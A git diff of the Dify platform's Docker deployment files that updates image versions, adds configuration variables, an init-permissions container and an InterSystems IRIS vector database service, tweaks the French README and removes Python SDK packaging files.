when exporting DSL files (default: true) @@ -1415,4 +1468,23 @@ WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE=100 WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration -TENANT_ISOLATED_TASK_CONCURRENCY=1 \ No newline at end of file +TENANT_ISOLATED_TASK_CONCURRENCY=1 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + +# The API key of amplitude +AMPLITUDE_API_KEY= + +# Sandbox expired records clean configuration +SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21 +SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000 +SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30 diff --git a/docker/docker-compose-template.yaml b/docker/docker-compose-template.yaml index 69bcd9dff8..a07ed9e8ad 100644 --- a/docker/docker-compose-template.yaml +++ b/docker/docker-compose-template.yaml @@ -1,8 +1,27 @@ x-shared-env: &shared-api-worker-env services: + # Init container to fix permissions + init_permissions: + image: busybox:latest + command: + - sh + - -c + - | + FLAG_FILE="/app/api/storage/.init_permissions" + if [ -f "$${FLAG_FILE}" ]; then + echo "Permissions already initialized. Exiting." + exit 0 + fi + echo "Initializing permissions for /app/api/storage" + chown -R 1001:1001 /app/api/storage && touch "$${FLAG_FILE}" + echo "Permissions initialized. Exiting." + volumes: + - ./volumes/app/storage:/app/api/storage + restart: "no" + # API service api: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -15,8 +34,11 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -41,7 +63,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.) worker: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -54,6 +76,8 @@ services: PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -78,7 +102,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -86,6 +110,8 @@ services: # Startup mode, 'worker_beat' starts the Celery beat for scheduling periodic tasks. MODE: beat depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -106,11 +132,12 @@ services: # Frontend web application. web: - image: langgenius/dify-web:1.10.1-fix.1 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} APP_API_URL: ${APP_API_URL:-} + AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} NEXT_PUBLIC_COOKIE_DOMAIN: ${NEXT_PUBLIC_COOKIE_DOMAIN:-} SENTRY_DSN: ${WEB_SENTRY_DSN:-} NEXT_TELEMETRY_DISABLED: ${NEXT_TELEMETRY_DISABLED:-0} @@ -243,7 +270,7 @@ services: # plugin daemon plugin_daemon: - image: langgenius/dify-plugin-daemon:0.4.1-local + image: langgenius/dify-plugin-daemon:0.5.1-local restart: always environment: # Use the shared environment variables. @@ -388,7 +415,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -426,6 +453,9 @@ services: AUTHORIZATION_ADMINLIST_ENABLED: ${WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED:-true} AUTHORIZATION_ADMINLIST_USERS: ${WEAVIATE_AUTHORIZATION_ADMINLIST_USERS:-hello@dify.ai} DISABLE_TELEMETRY: ${WEAVIATE_DISABLE_TELEMETRY:-false} + ENABLE_TOKENIZER_GSE: ${WEAVIATE_ENABLE_TOKENIZER_GSE:-false} + ENABLE_TOKENIZER_KAGOME_JA: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA:-false} + ENABLE_TOKENIZER_KAGOME_KR: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR:-false} # OceanBase vector database oceanbase: @@ -619,6 +649,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/docker-compose.middleware.yaml b/docker/docker-compose.middleware.yaml index 3a06fa16c0..ed35bc2652 100644 --- a/docker/docker-compose.middleware.yaml +++ b/docker/docker-compose.middleware.yaml @@ -123,7 +123,7 @@ services: # plugin daemon plugin_daemon: - image: langgenius/dify-plugin-daemon:0.4.1-local + image: langgenius/dify-plugin-daemon:0.5.1-local restart: always env_file: - ./middleware.env diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 407d240eeb..24e1077ebe 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -361,9 +361,26 @@ x-shared-env: &shared-api-worker-env CLICKZETTA_ANALYZER_TYPE: ${CLICKZETTA_ANALYZER_TYPE:-chinese} CLICKZETTA_ANALYZER_MODE: ${CLICKZETTA_ANALYZER_MODE:-smart} CLICKZETTA_VECTOR_DISTANCE_FUNCTION: ${CLICKZETTA_VECTOR_DISTANCE_FUNCTION:-cosine_distance} + IRIS_HOST: ${IRIS_HOST:-iris} + IRIS_SUPER_SERVER_PORT: ${IRIS_SUPER_SERVER_PORT:-1972} + IRIS_WEB_SERVER_PORT: ${IRIS_WEB_SERVER_PORT:-52773} + IRIS_USER: ${IRIS_USER:-_SYSTEM} + IRIS_PASSWORD: ${IRIS_PASSWORD:-Dify@1234} + IRIS_DATABASE: ${IRIS_DATABASE:-USER} + IRIS_SCHEMA: ${IRIS_SCHEMA:-dify} + IRIS_CONNECTION_URL: ${IRIS_CONNECTION_URL:-} + IRIS_MIN_CONNECTION: ${IRIS_MIN_CONNECTION:-1} + IRIS_MAX_CONNECTION: ${IRIS_MAX_CONNECTION:-3} + IRIS_TEXT_INDEX: ${IRIS_TEXT_INDEX:-true} + IRIS_TEXT_INDEX_LANGUAGE: ${IRIS_TEXT_INDEX_LANGUAGE:-en} + IRIS_TIMEZONE: ${IRIS_TIMEZONE:-UTC} UPLOAD_FILE_SIZE_LIMIT: ${UPLOAD_FILE_SIZE_LIMIT:-15} UPLOAD_FILE_BATCH_LIMIT: ${UPLOAD_FILE_BATCH_LIMIT:-5} UPLOAD_FILE_EXTENSION_BLACKLIST: ${UPLOAD_FILE_EXTENSION_BLACKLIST:-} + SINGLE_CHUNK_ATTACHMENT_LIMIT: ${SINGLE_CHUNK_ATTACHMENT_LIMIT:-10} + IMAGE_FILE_BATCH_LIMIT: ${IMAGE_FILE_BATCH_LIMIT:-10} + ATTACHMENT_IMAGE_FILE_SIZE_LIMIT: ${ATTACHMENT_IMAGE_FILE_SIZE_LIMIT:-2} + ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT: ${ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT:-60} ETL_TYPE: ${ETL_TYPE:-dify} UNSTRUCTURED_API_URL: ${UNSTRUCTURED_API_URL:-} UNSTRUCTURED_API_KEY: ${UNSTRUCTURED_API_KEY:-} @@ -438,6 +455,14 @@ x-shared-env: &shared-api-worker-env WORKFLOW_LOG_CLEANUP_ENABLED: ${WORKFLOW_LOG_CLEANUP_ENABLED:-false} WORKFLOW_LOG_RETENTION_DAYS: ${WORKFLOW_LOG_RETENTION_DAYS:-30} WORKFLOW_LOG_CLEANUP_BATCH_SIZE: ${WORKFLOW_LOG_CLEANUP_BATCH_SIZE:-100} + ALIYUN_SLS_ACCESS_KEY_ID: ${ALIYUN_SLS_ACCESS_KEY_ID:-} + ALIYUN_SLS_ACCESS_KEY_SECRET: ${ALIYUN_SLS_ACCESS_KEY_SECRET:-} + ALIYUN_SLS_ENDPOINT: ${ALIYUN_SLS_ENDPOINT:-} + ALIYUN_SLS_REGION: ${ALIYUN_SLS_REGION:-} + ALIYUN_SLS_PROJECT_NAME: ${ALIYUN_SLS_PROJECT_NAME:-} + ALIYUN_SLS_LOGSTORE_TTL: ${ALIYUN_SLS_LOGSTORE_TTL:-365} + LOGSTORE_DUAL_WRITE_ENABLED: ${LOGSTORE_DUAL_WRITE_ENABLED:-false} + LOGSTORE_DUAL_READ_ENABLED: ${LOGSTORE_DUAL_READ_ENABLED:-true} HTTP_REQUEST_NODE_MAX_BINARY_SIZE: ${HTTP_REQUEST_NODE_MAX_BINARY_SIZE:-10485760} HTTP_REQUEST_NODE_MAX_TEXT_SIZE: ${HTTP_REQUEST_NODE_MAX_TEXT_SIZE:-1048576} HTTP_REQUEST_NODE_SSL_VERIFY: ${HTTP_REQUEST_NODE_SSL_VERIFY:-True} @@ -475,6 +500,9 @@ x-shared-env: &shared-api-worker-env WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED: ${WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED:-true} WEAVIATE_AUTHORIZATION_ADMINLIST_USERS: ${WEAVIATE_AUTHORIZATION_ADMINLIST_USERS:-hello@dify.ai} WEAVIATE_DISABLE_TELEMETRY: ${WEAVIATE_DISABLE_TELEMETRY:-false} + WEAVIATE_ENABLE_TOKENIZER_GSE: ${WEAVIATE_ENABLE_TOKENIZER_GSE:-false} + WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA:-false} + WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR:-false} CHROMA_SERVER_AUTHN_CREDENTIALS: ${CHROMA_SERVER_AUTHN_CREDENTIALS:-difyai123456} CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} CHROMA_IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} @@ -508,7 +536,7 @@ x-shared-env: &shared-api-worker-env NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443} NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -563,6 +591,7 @@ x-shared-env: &shared-api-worker-env PLUGIN_STDIO_MAX_BUFFER_SIZE: ${PLUGIN_STDIO_MAX_BUFFER_SIZE:-5242880} PLUGIN_PYTHON_ENV_INIT_TIMEOUT: ${PLUGIN_PYTHON_ENV_INIT_TIMEOUT:-120} PLUGIN_MAX_EXECUTION_TIMEOUT: ${PLUGIN_MAX_EXECUTION_TIMEOUT:-600} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} PIP_MIRROR_URL: ${PIP_MIRROR_URL:-} PLUGIN_STORAGE_TYPE: ${PLUGIN_STORAGE_TYPE:-local} PLUGIN_STORAGE_LOCAL_ROOT: ${PLUGIN_STORAGE_LOCAL_ROOT:-/app/storage} @@ -611,7 +640,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} @@ -628,11 +657,40 @@ x-shared-env: &shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: ${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} + AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} + SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: ${SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD:-21} + SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: ${SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE:-1000} + SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: ${SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS:-30} services: + # Init container to fix permissions + init_permissions: + image: busybox:latest + command: + - sh + - -c + - | + FLAG_FILE="/app/api/storage/.init_permissions" + if [ -f "$${FLAG_FILE}" ]; then + echo "Permissions already initialized. Exiting." + exit 0 + fi + echo "Initializing permissions for /app/api/storage" + chown -R 1001:1001 /app/api/storage && touch "$${FLAG_FILE}" + echo "Permissions initialized. Exiting." + volumes: + - ./volumes/app/storage:/app/api/storage + restart: "no" + # API service api: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -645,8 +703,11 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -671,7 +732,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.) worker: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -684,6 +745,8 @@ services: PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -708,7 +771,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -716,6 +779,8 @@ services: # Startup mode, 'worker_beat' starts the Celery beat for scheduling periodic tasks. MODE: beat depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -736,11 +801,12 @@ services: # Frontend web application. web: - image: langgenius/dify-web:1.10.1-fix.1 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} APP_API_URL: ${APP_API_URL:-} + AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} NEXT_PUBLIC_COOKIE_DOMAIN: ${NEXT_PUBLIC_COOKIE_DOMAIN:-} SENTRY_DSN: ${WEB_SENTRY_DSN:-} NEXT_TELEMETRY_DISABLED: ${NEXT_TELEMETRY_DISABLED:-0} @@ -873,7 +939,7 @@ services: # plugin daemon plugin_daemon: - image: langgenius/dify-plugin-daemon:0.4.1-local + image: langgenius/dify-plugin-daemon:0.5.1-local restart: always environment: # Use the shared environment variables. @@ -1018,7 +1084,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -1056,6 +1122,9 @@ services: AUTHORIZATION_ADMINLIST_ENABLED: ${WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED:-true} AUTHORIZATION_ADMINLIST_USERS: ${WEAVIATE_AUTHORIZATION_ADMINLIST_USERS:-hello@dify.ai} DISABLE_TELEMETRY: ${WEAVIATE_DISABLE_TELEMETRY:-false} + ENABLE_TOKENIZER_GSE: ${WEAVIATE_ENABLE_TOKENIZER_GSE:-false} + ENABLE_TOKENIZER_KAGOME_JA: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA:-false} + ENABLE_TOKENIZER_KAGOME_KR: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR:-false} # OceanBase vector database oceanbase: @@ -1249,6 +1318,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/iris/docker-entrypoint.sh b/docker/iris/docker-entrypoint.sh new file mode 100755 index 0000000000..067bfa03e2 --- /dev/null +++ b/docker/iris/docker-entrypoint.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e + +# IRIS configuration flag file +IRIS_CONFIG_DONE="/opt/iris/.iris-configured" + +# Function to configure IRIS +configure_iris() { + echo "Configuring IRIS for first-time setup..." + + # Wait for IRIS to be fully started + sleep 5 + + # Execute the initialization script + iris session IRIS < /iris-init.script + + # Mark configuration as done + touch "$IRIS_CONFIG_DONE" + + echo "IRIS configuration completed." +} + +# Start IRIS in background for initial configuration if not already configured +if [ ! -f "$IRIS_CONFIG_DONE" ]; then + echo "First-time IRIS setup detected. Starting IRIS for configuration..." + + # Start IRIS + iris start IRIS + + # Configure IRIS + configure_iris + + # Stop IRIS + iris stop IRIS quietly +fi + +# Run the original IRIS entrypoint +exec /iris-main "$@" diff --git a/docker/iris/iris-init.script b/docker/iris/iris-init.script new file mode 100644 index 0000000000..c41fcf4efb --- /dev/null +++ b/docker/iris/iris-init.script @@ -0,0 +1,11 @@ +// Switch to the %SYS namespace to modify system settings +set $namespace="%SYS" + +// Set predefined user passwords to never expire (default password: SYS) +Do ##class(Security.Users).UnExpireUserPasswords("*") + +// Change the default password  +Do $SYSTEM.Security.ChangePassword("_SYSTEM","Dify@1234") + +// Install the Japanese locale (default is English since the container is Ubuntu-based) +// Do ##class(Config.NLS.Locales).Install("jpuw") diff --git a/docker/middleware.env.example b/docker/middleware.env.example index d4cbcd1762..f7e0252a6f 100644 --- a/docker/middleware.env.example +++ b/docker/middleware.env.example @@ -213,3 +213,24 @@ PLUGIN_VOLCENGINE_TOS_ENDPOINT= PLUGIN_VOLCENGINE_TOS_ACCESS_KEY= PLUGIN_VOLCENGINE_TOS_SECRET_KEY= PLUGIN_VOLCENGINE_TOS_REGION= + +# ------------------------------ +# Environment Variables for Aliyun SLS (Simple Log Service) +# ------------------------------ +# Aliyun SLS Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun SLS Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Aliyun SLS Logstore TTL (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both LogStore and SQL database (default: true) +LOGSTORE_DUAL_WRITE_ENABLED=true +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true \ No newline at end of file diff --git a/docs/fr-FR/README.md b/docs/fr-FR/README.md index 03f3221798..291c8dab40 100644 --- a/docs/fr-FR/README.md +++ b/docs/fr-FR/README.md @@ -61,14 +61,14 @@

langgenius%2Fdify | Trendshift

-Dify est une plateforme de développement d'applications LLM open source. Son interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales: +Dify est une plateforme de développement d'applications LLM open source. Sa interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales:

**1. Flux de travail** : Construisez et testez des flux de travail d'IA puissants sur un canevas visuel, en utilisant toutes les fonctionnalités suivantes et plus encore. **2. Prise en charge complète des modèles** : -Intégration transparente avec des centaines de LLM propriétaires / open source provenant de dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve [ici](https://docs.dify.ai/getting-started/readme/model-providers). +Intégration transparente avec des centaines de LLM propriétaires / open source offerts par dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve [ici](https://docs.dify.ai/getting-started/readme/model-providers). ![providers-v5](https://github.com/langgenius/dify/assets/13230914/5a17bdbe-097a-4100-8363-40255b70f6e3) @@ -79,7 +79,7 @@ Interface intuitive pour créer des prompts, comparer les performances des modè Des capacités RAG étendues qui couvrent tout, de l'ingestion de documents à la récupération, avec un support prêt à l'emploi pour l'extraction de texte à partir de PDF, PPT et autres formats de document courants. **5. Capacités d'agent** : -Vous pouvez définir des agents basés sur l'appel de fonction LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. +Vous pouvez définir des agents basés sur l'appel de fonctions LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. **6. LLMOps** : Surveillez et analysez les journaux d'application et les performances au fil du temps. Vous pouvez continuellement améliorer les prompts, les ensembles de données et les modèles en fonction des données de production et des annotations. diff --git a/sdks/python-client/LICENSE b/sdks/python-client/LICENSE deleted file mode 100644 index 873e44b4bc..0000000000 --- a/sdks/python-client/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2023 LangGenius - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. diff --git a/sdks/python-client/MANIFEST.in b/sdks/python-client/MANIFEST.in deleted file mode 100644 index 34b7e8711c..0000000000 --- a/sdks/python-client/MANIFEST.in +++ /dev/null @@ -1,3 +0,0 @@ -recursive-include dify_client *.py -include README.md -include LICENSE diff --git a/sdks/python-client/README.md b/sdks/python-client/README.md deleted file mode 100644 index ebfb5f5397..0000000000 --- a/sdks/python-client/README.md +++ /dev/null @@ -1,409 +0,0 @@ -# dify-client - -A Dify App Service-API Client, using for build a webapp by request Service-API - -## Usage - -First, install `dify-client` python sdk package: - -``` -pip install dify-client -``` - -### Synchronous Usage - -Write your code with sdk: - -- completion generate with `blocking` response_mode - -```python -from dify_client import CompletionClient - -api_key = "your_api_key" - -# Initialize CompletionClient -completion_client = CompletionClient(api_key) - -# Create Completion Message using 